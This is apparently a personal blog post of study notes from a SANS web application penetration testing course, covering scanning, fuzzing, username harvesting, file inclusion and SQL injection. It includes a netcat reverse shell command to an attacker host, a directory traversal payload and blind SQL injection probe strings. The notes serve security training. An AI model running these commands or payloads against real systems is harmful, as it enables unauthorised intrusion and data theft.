Inaccurate Design

SANS GWAPT Day 2: Server Side Discovery

Tuesday, 14 May 2013

Discovery Phase

  • Use this phase to find vulnerabilities, and confirm that they’re not false positives. Don’t use them for further exploitation (yet).

  • Always spider your target first, then scan for vulnerabilities. This will ensure that you’re scanning the entire target and you don’t miss entire sections of the application.

  • Don’t run all the plugins of the scanner.

    1. It can take a very, very long time
    2. It will come back with a whole bunch of vulnerabilities that you either don’t care about or won’t bother reporting anyway
  • When you do your scans, ensure you exclude any logout links (if you’re doing an authenticated scan). This will ensure the scanner doesn’t log itself out halfway through a scan

  • Skipfish will scan entire domain by default, regardless of url given (use -I option to override)l

    • Skipfish is very fast, but watch this does not cause issues on your target site (ie. crashing it under the load, or triggering IDS/IPS systems)
    • Skipfish can perform adaptive bruteforcing - that is, chaning it’s attack behaviour based on what it finds.
    • Can target handle multiple technologies - ie PHP, ASP, etc
  • Can also use w3af


  • Throwing random strings at the application to see how it reacts, through various inputs

    • Inputs can include cookies, headers, GET and POST parameters.
    • Fuzz combinations of input lengths, characters, types of data (strings, ints, dates)
    • Can reveal buffer overflow, command injection, XSS, and SQL Injection vulnerabilities
  • Context is important! No point in fuzzing an application with Windows vulnerabilities if you know the target runs Linux

  • FuzzDB is a database of possible (verified) strings to use for fuzzing.

    • can be used with the Interuder module of Burp (and other tools) for automated fuzzing
    • has an ‘errors.txt’ file that contains common error messages, which can be used by automated tools such as Burp
  • You can use the ‘Comparer’ function in Burp to compare results of responses/requests when fuzzing

    • can also compare manually, or using commands like diff

Username Harvesting

  • Can use signup forms, login forms, password reset forms, to figure out in use usernames

  • Bruteforcing takes a long time, can automatically fuzz with the right tools

    • check for differences in pages, URLs or error messages and configure your tool to look for these.

Netcat shells

  • Use netcat to get shell access on the target machine

    • on receiver: nc -l -p 3000
    • on target: nc x.x.x.x 3000 -e /bin/bash
  • Execute any way you can

    • directly through command injection
    • editing a file that gets executed
  • Start a proper bash shell once you have nc access, with errors redirected to stdout - /bin/bash -i 2>&1

Directory Traversal/Local File Includes/Remote File Includes

  • Can add (for example) to get around extension checking

    • If the app checks last three chars of filename, this will trick it
    • %00 is a null byte, commonly used in C/C++ to indicate the end of the file. When the file gets read, the app won’t read past the null byte
    • eg: index.htm?include=../../../boot.ini%00.htm
  • Can also try and include files from remote (attacker controlled) server to get them to execute on the target machines.

    • good way to start get an nc shell

SQL Injection

  • Three ways an application can quote a vulnerable SQL query

    • no quotes
    • single quote
    • double quote
  • You can try which method of quoting the target app is using by trying

    • one single quote (breaks ‘no quoting’ and ‘single quoting’ methods)
    • one double quote (breaks ‘no quoting’ and ‘double quoting’ methods)
    • try multiple quotes (adding one at a time) to build up a view of how the query is constructed
  • Remember to check the HTML source, as often the output will not be displayed but end up in awkward spots in the code

    • Use Burp Comparer to check outputs when automating
  • [TamperData]() and [SQLInjectMe]() are Firefox extensions can be used to fuzz fields in your target application

    • might need in browser editing if the web app is pinning certificates, as intercepting proxies will screw around with the certificates being presented
  • Be wary of any client side validation when using browser extensions

Blind SQL Injection

  • More difficult to find and exploit, as by definition they don’t show the output on the page

    • Often the results will be shown in teh form of no data return, eg. an unsuccesful search in the application
  • A few methods to finding blind SQL injections

1. Use Yes/No questions to find

Shows item:     index.php?itemid=9
No data:    index.php?itemid=;
Shows item:     index.php?itemid=9' and 1=1; --
No data:    index.php?itemid=9' and 1=0; --
  • Can use tricks such as the following to close all pairs of brackets

    where id=‘1’ and ‘a’=‘a’

  • Can bruteforce characters out of databases, by only getting the first character, and comparing to ‘a’, ‘b’, ‘c’, etc.

    • evaluate the result to a comparison character to turn it into a true/false query
    • can take a very long time, use automated tools

2. Use timing attacks

  • SQL commands such as [benchmark()]() and [waitfor()]() will cause a noticable delay

  • Tools like [SQLMap]() and [Absinthe]() are good here

Cross Site Scripting

  • [XSS Me]() is a browser extension, similar to SQLInjectMe, that can be used for ‘one click’ XSS testing.